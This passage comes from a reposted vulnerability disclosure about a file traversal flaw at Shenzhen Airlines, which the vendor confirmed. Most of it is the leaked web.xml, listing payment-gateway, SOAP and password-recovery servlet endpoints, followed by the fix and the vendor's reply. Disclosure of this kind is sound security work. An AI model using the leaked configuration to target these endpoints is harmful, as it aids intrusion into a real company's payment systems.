<servlet-title>

com.iss.szair.b2c.uiue.servlet.PaymentUiueReturnServlet

</servlet-title>

</servlet>

<!--  add by yudx 20141204 neb-536 官网UIUIE快捷支付 end  -->

<servlet-mapping id="ServletMapping_savePriceServlet">

<servlet-name>SavePriceServlet</servlet-name>

<url-pattern>/servlet/SavePrice</url-pattern>

</servlet-mapping>

<!--  add by yudx 20141204 neb-536 官网UIUIE快捷支付 start  -->

<servlet-mapping id="ServletMapping_64552591">

<servlet-name>PaymentUiueNotifyServlet</servlet-name>

<url-pattern>/servlet/PaymentUiueNotifyServlet</url-pattern>

</servlet-mapping>

<servlet-mapping id="ServletMapping_64552601">

<servlet-name>PaymentUiueReturnServlet</servlet-name>

<url-pattern>/servlet/PaymentUiueReturnServlet</url-pattern>

</servlet-mapping>

<!--  add by yudx 20141204 neb-536 官网UIUIE快捷支付 end  -->

<servlet-mapping id="ServletMapping_interImage3D">

<servlet-name>InterCheckImageServlet3D</servlet-name>

<url-pattern>/servlet/InterCheckImageServlet3D</url-pattern>

</servlet-mapping>

<servlet-mapping id="ServletMapping_image3D">

<servlet-name>CheckImageServlet3D</servlet-name>

<url-pattern>/servlet/CheckImageServlet3D</url-pattern>

</servlet-mapping>

<servlet-mapping id="ServletMapping_image3DNew">

<servlet-name>CheckImageServlet3DNew</servlet-name>

<url-pattern>/servlet/CheckImageServlet3DNew</url-pattern>

</servlet-mapping>

<!--

 ADD By zhangchunyu 20140825 NEB-544 B2C系统机票验真功能增加有效校验与查询限制 Start 

-->

<servlet-mapping id="ServletMapping_1233884491919">

<servlet-name>RandomImgServlet</servlet-name>

<url-pattern>/servlet/RandomImgServlet</url-pattern>

</servlet-mapping>

<!--

 ADD By zhangchunyu 20140825 NEB-544 B2C系统机票验真功能增加有效校验与查询限制 End 

-->

<servlet-mapping id="ServletMapping_6455255">

<servlet-name>PaymentPlantServlet</servlet-name>

<url-pattern>/servlet/PaymentPlantServlet</url-pattern>

</servlet-mapping>

<servlet-mapping id="ServletMapping_6455256">

<servlet-name>PaymentPlantNotifyServlet</servlet-name>

<url-pattern>/servlet/PaymentPlantNotifyServlet</url-pattern>

</servlet-mapping>

<servlet-mapping id="ServletMapping_64552590">

<servlet-name>NewAPINotifyServlet</servlet-name>

<url-pattern>/servlet/NewAPINotifyServlet</url-pattern>

</servlet-mapping>

<servlet-mapping id="ServletMapping_6455257">

<servlet-name>PaymentGuoNeiPlantServlet</servlet-name>

<url-pattern>/servlet/PaymentGuoNeiPlantServlet</url-pattern>

</servlet-mapping>

<servlet-mapping id="ServletMapping_6455258">

<servlet-name>PaymentGuoNeiPlantNotifyServlet</servlet-name>

<url-pattern>/servlet/PaymentGuoNeiPlantNotifyServlet</url-pattern>

</servlet-mapping>

<!--  pujian payinterface  -->

<!--

 ADD By li-jun-neu 20140126 NEB-93 B2C 使用支付平台接口 Start 

-->

<servlet-mapping id="ServletMapping_6455259">

<servlet-name>PaymentServlet</servlet-name>

<url-pattern>/servlet/PaymentServlet</url-pattern>

</servlet-mapping>

<!--  ADD By li-jun-neu 20140126 NEB-93B2C 使用支付平台接口 End  -->

<servlet-mapping id="ServletMapping_image">

<servlet-name>CheckImageServlet</servlet-name>

<url-pattern>/servlet/CheckImageServlet</url-pattern>

</servlet-mapping>

<servlet-mapping id="ServletMapping_1282032712510">

<servlet-name>TejiaMailBookServlet</servlet-name>

<url-pattern>/servlet/TejiaMailBookServlet</url-pattern>

</servlet-mapping>

<servlet-mapping id="ServletMapping_1233884491878">

<servlet-name>BarcodeServlet</servlet-name>

<url-pattern>/gensvg</url-pattern>

</servlet-mapping>

<servlet-mapping id="ServletMapping_9082011072202">

<servlet-name>FindPasswordServlet</servlet-name>

<url-pattern>/servlet/findServlet</url-pattern>

</servlet-mapping>

<servlet-mapping id="ServletMapping_9282011072202">

<servlet-name>ValidateUserServlet</servlet-name>

<url-pattern>/servlet/userServlet</url-pattern>

</servlet-mapping>

<servlet-mapping id="ServletMapping_1233884491879">

<servlet-name>BarcodeServlet</servlet-name>

<url-pattern>/genbc</url-pattern>

</servlet-mapping>

<servlet-mapping id="ServletMapping_1243957877209">

<servlet-name>GZUNIONB2CServlet</servlet-name>

<url-pattern>

/servlet/com.iss.szair.bank.gzunion.GZUNIONB2CServlet

</url-pattern>

</servlet-mapping>

<servlet-mapping id="ServletMapping_1282032712511">

<servlet-name>QuickMoneyB2CServlet</servlet-name>

<url-pattern>

/servlet/com.iss.szair.bank.quickmpay.QuickMoneyB2CServlet

</url-pattern>

</servlet-mapping>

<servlet-mapping id="ServletMapping_1282032712599">

<servlet-name>QuickMoneyCCServlet</servlet-name>

<url-pattern>

/servlet/com.iss.szair.bank.quickmpay.cc.QuickMoneyCCServlet

</url-pattern>

</servlet-mapping>

<!--  add by xingjg NEB-80-社会化值机 start  -->

<servlet-mapping id="ServletMapping_1282032712580">

<servlet-name>PlatformLoginServlet</servlet-name>

<url-pattern>

/servlet/com.iss.szair.b2c.checkin.platform.LoginServlet

</url-pattern>

</servlet-mapping>

<!--  add by xingjg NEB-80-社会化值机 end  -->

<servlet-mapping id="ServletMapping_1337167924177">

<servlet-name>WyzxB2CServlet</servlet-name>

<url-pattern>/servlet/com.iss.szair.bank.wyzxen.WyzxB2CServlet</url-pattern>

</servlet-mapping>

<servlet-mapping id="ServletMapping_1282032712512">

<servlet-name>BOCOMB2CServlet</servlet-name>

<url-pattern>/servlet/com.iss.szair.bank.bocom.BOCOMB2CServlet</url-pattern>

</servlet-mapping>

<servlet-mapping id="ServletMapping_1233884491880">

<servlet-name>BarcodeErrorServlet</servlet-name>

<url-pattern>/errsvg</url-pattern>

</servlet-mapping>

<servlet-mapping id="ServletMapping_1233884491882">

<servlet-name>BankPayServlet</servlet-name>

<url-pattern>/servlet/com.iss.szair.bank.BankPayServlet</url-pattern>

</servlet-mapping>

<servlet-mapping id="ServletMapping_1233884491883">

<servlet-name>WapBankPayServlet</servlet-name>

<url-pattern>/servlet/com.iss.szair.bank.WapBankPayServlet</url-pattern>

</servlet-mapping>

<servlet-mapping id="ServletMapping_1233884491884">

<servlet-name>ABCB2CServlet</servlet-name>

<url-pattern>/servlet/com.iss.szair.bank.abc.ABCB2CServlet</url-pattern>

</servlet-mapping>

<servlet-mapping id="ServletMapping_1233884491913">

<servlet-name>EPosPayServlet</servlet-name>

<url-pattern>

/servlet/com.iss.szair.bank.yeepay.epos.EPosPayServlet

</url-pattern>

</servlet-mapping>

<servlet-mapping id="ServletMapping_1233884491885">

<servlet-name>AliPayB2CServlet</servlet-name>

<url-pattern>

/servlet/com.iss.szair.bank.alipay.AliPayB2CServlet

</url-pattern>

</servlet-mapping>

<servlet-mapping id="ServletMapping_1243957877210">

<servlet-name>AliPayB2CServlet1</servlet-name>

<url-pattern>

/servlet/com.iss.szair.bank.alipay.AliPayB2CServlet1

</url-pattern>

</servlet-mapping>

<servlet-mapping id="ServletMapping_1233884491886">

<servlet-name>CCBB2CServlet</servlet-name>

<url-pattern>/servlet/com.iss.szair.bank.ccb.CCBB2CServlet</url-pattern>

</servlet-mapping>

<servlet-mapping id="ServletMapping_1233884491887">

<servlet-name>CCBWapB2CServlet</servlet-name>

<url-pattern>/servlet/com.iss.szair.bank.ccb.CCBWapB2CServlet</url-pattern>

</servlet-mapping>

<servlet-mapping id="ServletMapping_1233884491888">

<servlet-name>BCB2CServlet</servlet-name>

<url-pattern>/servlet/com.iss.szair.bank.bc.BCB2CServlet</url-pattern>

</servlet-mapping>

<servlet-mapping id="ServletMapping_1233884491889">

<servlet-name>CMBB2CServlet</servlet-name>

<url-pattern>/servlet/com.iss.szair.bank.cmb.CMBB2CServlet</url-pattern>

</servlet-mapping>

<servlet-mapping id="ServletMapping_1233884491890">

<servlet-name>CHINAPNRB2CServlet</servlet-name>

<url-pattern>

/servlet/com.iss.szair.bank.chinapnr.CHINAPNRB2CServlet

</url-pattern>

</servlet-mapping>

<servlet-mapping id="ServletMapping_1233884491891">

<servlet-name>CHINAPNRB2CServlet1</servlet-name>

<url-pattern>

/servlet/com.iss.szair.bank.chinapnr.CHINAPNRB2CServlet1

</url-pattern>

</servlet-mapping>

<servlet-mapping id="ServletMapping_1233884491892">

<servlet-name>CHINAPNRMASB2CServlet</servlet-name>

<url-pattern>

/servlet/com.iss.szair.bank.chinapnr.CHINAPNRMASB2CServlet

</url-pattern>

</servlet-mapping>

<servlet-mapping id="ServletMapping_1233884491893">

<servlet-name>CHINAPNRMASB2CRefundServlet</servlet-name>

<url-pattern>

/servlet/com.iss.szair.bank.chinapnr.CHINAPNRMASB2CRefundServlet

</url-pattern>

</servlet-mapping>

<servlet-mapping id="ServletMapping_1233884491894">

<servlet-name>ICBCB2CServlet</servlet-name>

<url-pattern>/servlet/com.iss.szair.bank.icbc.ICBCB2CServlet</url-pattern>

</servlet-mapping>

<servlet-mapping id="ServletMapping_1233884491895">

<servlet-name>SDBB2CServlet</servlet-name>

<url-pattern>/servlet/com.iss.szair.bank.sdb.SDBB2CServlet</url-pattern>

</servlet-mapping>

<servlet-mapping id="ServletMapping_1233884491896">

<servlet-name>SZSHPDB2CServlet</servlet-name>

<url-pattern>/servlet/com.iss.szair.bank.spdb.SZSHPDB2CServlet</url-pattern>

</servlet-mapping>

<servlet-mapping id="ServletMapping_1233884491897">

<servlet-name>SZUnionServlet</servlet-name>

<url-pattern>

/servlet/com.iss.szair.bank.szunion.SZUNIONB2CServlet

</url-pattern>

</servlet-mapping>

<servlet-mapping id="ServletMapping_1233884491898">

<servlet-name>YeePay2CServlet</servlet-name>

<url-pattern>/servlet/com.iss.szair.bank.yeepay.YeePay2CServlet</url-pattern>

</servlet-mapping>

<servlet-mapping id="ServletMapping_1233884491899">

<servlet-name>TenPayB2CServlet</servlet-name>

<url-pattern>

/servlet/com.iss.szair.bank.tenpay.TenPayB2CServlet

</url-pattern>

</servlet-mapping>

<servlet-mapping id="ServletMapping_1233884491900">

<servlet-name>AjaxServlet</servlet-name>

<url-pattern>/com.shenzhenair.shem.gift.checkCardServlet</url-pattern>

</servlet-mapping>

<servlet-mapping id="ServletMapping_1233884491901">

<servlet-name>action</servlet-name>

<url-pattern>*.do</url-pattern>

</servlet-mapping>

<servlet-mapping id="ServletMapping_1233884491902">

<servlet-name>SelectCityServlet</servlet-name>

<url-pattern>/servlet/SelectCityServlet</url-pattern>

</servlet-mapping>

<servlet-mapping id="ServletMapping_1233884491903">

<servlet-name>CrmScoreServlet</servlet-name>

<url-pattern>/servlet/CrmScoreServlet</url-pattern>

</servlet-mapping>

<servlet-mapping id="ServletMapping_1233884491904">

<servlet-name>ChineseWordServlet</servlet-name>

<url-pattern>/servlet/ChineseWordServlet</url-pattern>

</servlet-mapping>

<servlet-mapping id="ServletMapping_1233884491905">

<servlet-name>AxisServlet</servlet-name>

<url-pattern>/servlet/AxisServlet</url-pattern>

</servlet-mapping>

<servlet-mapping id="ServletMapping_1233884491906">

<servlet-name>AxisServlet</servlet-name>

<url-pattern>*.jws</url-pattern>

</servlet-mapping>

<servlet-mapping id="ServletMapping_1233884491907">

<servlet-name>AxisServlet</servlet-name>

<url-pattern>/services/*</url-pattern>

</servlet-mapping>

<servlet-mapping id="ServletMapping_1233884491908">

<servlet-name>SOAPMonitorService</servlet-name>

<url-pattern>/SOAPMonitor</url-pattern>

</servlet-mapping>

<servlet-mapping id="ServletMapping_1233884491909">

<servlet-name>Barbecue</servlet-name>

<url-pattern>/barbecue/barcode</url-pattern>

</servlet-mapping>

<servlet-mapping id="ServletMapping_1233884491910">

<servlet-name>dwr-invoker</servlet-name>

<url-pattern>/dwr/*</url-pattern>

</servlet-mapping>

<servlet-mapping id="ServletMapping_1233884491911">

<servlet-name>SearchEngineServlet</servlet-name>

<url-pattern>/servlet/SearchEngineServlet</url-pattern>

</servlet-mapping>

<servlet-mapping id="ServletMapping_1233884491912">

<servlet-name>PSBCB2CServlet</servlet-name>

<url-pattern>/servlet/PSBCB2CServlet</url-pattern>

</servlet-mapping>

<session-config id="SessionConfig_1233884491878">

<session-timeout>45</session-timeout>

</session-config>

<mime-mapping id="MimeMapping_1154677298328">

<extension>abs</extension>

<mime-type>audio/x-mpeg</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1233884491878">

<extension>xsl</extension>

<mime-type>text/xml</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298329">

<extension>ai</extension>

<mime-type>application/postscript</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298330">

<extension>aif</extension>

<mime-type>audio/x-aiff</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298331">

<extension>aifc</extension>

<mime-type>audio/x-aiff</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298332">

<extension>aiff</extension>

<mime-type>audio/x-aiff</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298333">

<extension>aim</extension>

<mime-type>application/x-aim</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298334">

<extension>art</extension>

<mime-type>image/x-jg</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298335">

<extension>asf</extension>

<mime-type>video/x-ms-asf</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298336">

<extension>asx</extension>

<mime-type>video/x-ms-asf</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298337">

<extension>au</extension>

<mime-type>audio/basic</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298338">

<extension>avi</extension>

<mime-type>video/x-msvideo</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298339">

<extension>avx</extension>

<mime-type>video/x-rad-screenplay</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298340">

<extension>bcpio</extension>

<mime-type>application/x-bcpio</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298341">

<extension>bin</extension>

<mime-type>application/octet-stream</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298342">

<extension>bmp</extension>

<mime-type>image/bmp</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298343">

<extension>body</extension>

<mime-type>text/html</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298344">

<extension>cdf</extension>

<mime-type>application/x-cdf</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298345">

<extension>cer</extension>

<mime-type>application/x-x509-ca-cert</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298346">

<extension>title</extension>

<mime-type>application/java</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298347">

<extension>cpio</extension>

<mime-type>application/x-cpio</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298348">

<extension>csh</extension>

<mime-type>application/x-csh</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298349">

<extension>css</extension>

<mime-type>text/css</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298359">

<extension>dib</extension>

<mime-type>image/bmp</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298360">

<extension>doc</extension>

<mime-type>application/msword</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298361">

<extension>ppt</extension>

<mime-type>application/ppt</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298362">

<extension>mht</extension>

<mime-type>text/x-mht</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298363">

<extension>xls</extension>

<mime-type>application/msexcel</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298364">

<extension>dtd</extension>

<mime-type>text/plain</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298365">

<extension>dv</extension>

<mime-type>video/x-dv</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298366">

<extension>dvi</extension>

<mime-type>application/x-dvi</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298367">

<extension>eps</extension>

<mime-type>application/postscript</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298368">

<extension>etx</extension>

<mime-type>text/x-setext</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298369">

<extension>exe</extension>

<mime-type>application/octet-stream</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298370">

<extension>gif</extension>

<mime-type>image/gif</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298371">

<extension>gtar</extension>

<mime-type>application/x-gtar</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298372">

<extension>gz</extension>

<mime-type>application/x-gzip</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298373">

<extension>hdf</extension>

<mime-type>application/x-hdf</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298374">

<extension>hqx</extension>

<mime-type>application/mac-binhex40</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298375">

<extension>htc</extension>

<mime-type>text/x-component</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298376">

<extension>htm</extension>

<mime-type>text/html</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298377">

<extension>html</extension>

<mime-type>text/html</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298378">

<extension>hqx</extension>

<mime-type>application/mac-binhex40</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298379">

<extension>ief</extension>

<mime-type>image/ief</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298380">

<extension>jad</extension>

<mime-type>text/vnd.sun.j2me.app-descriptor</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298381">

<extension>jar</extension>

<mime-type>application/java-archive</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298382">

<extension>java</extension>

<mime-type>text/plain</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298383">

<extension>jnlp</extension>

<mime-type>application/x-java-jnlp-file</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298384">

<extension>jpe</extension>

<mime-type>image/jpeg</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298385">

<extension>jpeg</extension>

<mime-type>image/jpeg</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298386">

<extension>jpg</extension>

<mime-type>image/jpeg</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298387">

<extension>js</extension>

<mime-type>text/javascript</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298388">

<extension>jsf</extension>

<mime-type>text/plain</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298389">

<extension>jspf</extension>

<mime-type>text/plain</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298390">

<extension>kar</extension>

<mime-type>audio/x-midi</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298391">

<extension>latex</extension>

<mime-type>application/x-latex</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298392">

<extension>m3u</extension>

<mime-type>audio/x-mpegurl</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298393">

<extension>mac</extension>

<mime-type>image/x-macpaint</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298394">

<extension>man</extension>

<mime-type>application/x-troff-man</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298395">

<extension>me</extension>

<mime-type>application/x-troff-me</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298396">

<extension>mid</extension>

<mime-type>audio/x-midi</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298397">

<extension>midi</extension>

<mime-type>audio/x-midi</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298398">

<extension>mif</extension>

<mime-type>application/x-mif</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298399">

<extension>mov</extension>

<mime-type>video/quicktime</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298400">

<extension>movie</extension>

<mime-type>video/x-sgi-movie</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298401">

<extension>mp1</extension>

<mime-type>audio/x-mpeg</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298402">

<extension>mp2</extension>

<mime-type>audio/x-mpeg</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298403">

<extension>mp3</extension>

<mime-type>audio/x-mpeg</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298404">

<extension>mpa</extension>

<mime-type>audio/x-mpeg</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298405">

<extension>mpe</extension>

<mime-type>video/mpeg</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298406">

<extension>mpeg</extension>

<mime-type>video/mpeg</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298407">

<extension>mpega</extension>

<mime-type>audio/x-mpeg</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298408">

<extension>mpg</extension>

<mime-type>video/mpeg</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298409">

<extension>mpv2</extension>

<mime-type>video/mpeg2</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298410">

<extension>ms</extension>

<mime-type>application/x-wais-source</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298411">

<extension>nc</extension>

<mime-type>application/x-netcdf</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298412">

<extension>oda</extension>

<mime-type>application/oda</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298413">

<extension>pbm</extension>

<mime-type>image/x-portable-bitmap</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298414">

<extension>pct</extension>

<mime-type>image/pict</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298415">

<extension>pdf</extension>

<mime-type>application/pdf</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298416">

<extension>pgm</extension>

<mime-type>image/x-portable-graymap</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298417">

<extension>pic</extension>

<mime-type>image/pict</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298418">

<extension>pict</extension>

<mime-type>image/pict</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298419">

<extension>pls</extension>

<mime-type>audio/x-scpls</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298420">

<extension>png</extension>

<mime-type>image/png</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298421">

<extension>pnm</extension>

<mime-type>image/x-portable-anymap</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298422">

<extension>pnt</extension>

<mime-type>image/x-macpaint</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298423">

<extension>ppm</extension>

<mime-type>image/x-portable-pixmap</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298424">

<extension>ps</extension>

<mime-type>application/postscript</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298425">

<extension>psd</extension>

<mime-type>image/x-photoshop</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298426">

<extension>qt</extension>

<mime-type>video/quicktime</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298427">

<extension>qti</extension>

<mime-type>image/x-quicktime</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298428">

<extension>qtif</extension>

<mime-type>image/x-quicktime</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298429">

<extension>rar</extension>

<mime-type>application/x-rar-compressed</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298430">

<extension>ras</extension>

<mime-type>image/x-cmu-raster</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298431">

<extension>rgb</extension>

<mime-type>image/x-rgb</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298432">

<extension>rm</extension>

<mime-type>application/vnd.rn-realmedia</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298433">

<extension>roff</extension>

<mime-type>application/x-troff</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298434">

<extension>rtf</extension>

<mime-type>application/rtf</mime-type>

</mime-mapping>

<mime-mapping id="MimeMapping_1154677298435">

 

修复方案:

# 补丁

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2016-05-11 09:20

厂商回复:

感谢您对深航信息系统的关注和帮助,我们将尽快排查程序修补漏洞

最新状态:

暂无

本文标签:

版权声明:若无特殊注明,本文皆为《安三》原创,转载请保留文章出处。『鹦鹉搜索』

百度收录:百度已收录『查看详情』

本文链接:深圳航空java容器字符集解析不当导致任意文件遍历 - https://www.15qq.cn/wooyun/460.html

相关文章

发表评论

电子邮件地址不会被公开。 必填项已用*标注

未显示?请点击刷新

允许邮件通知

大家都在搜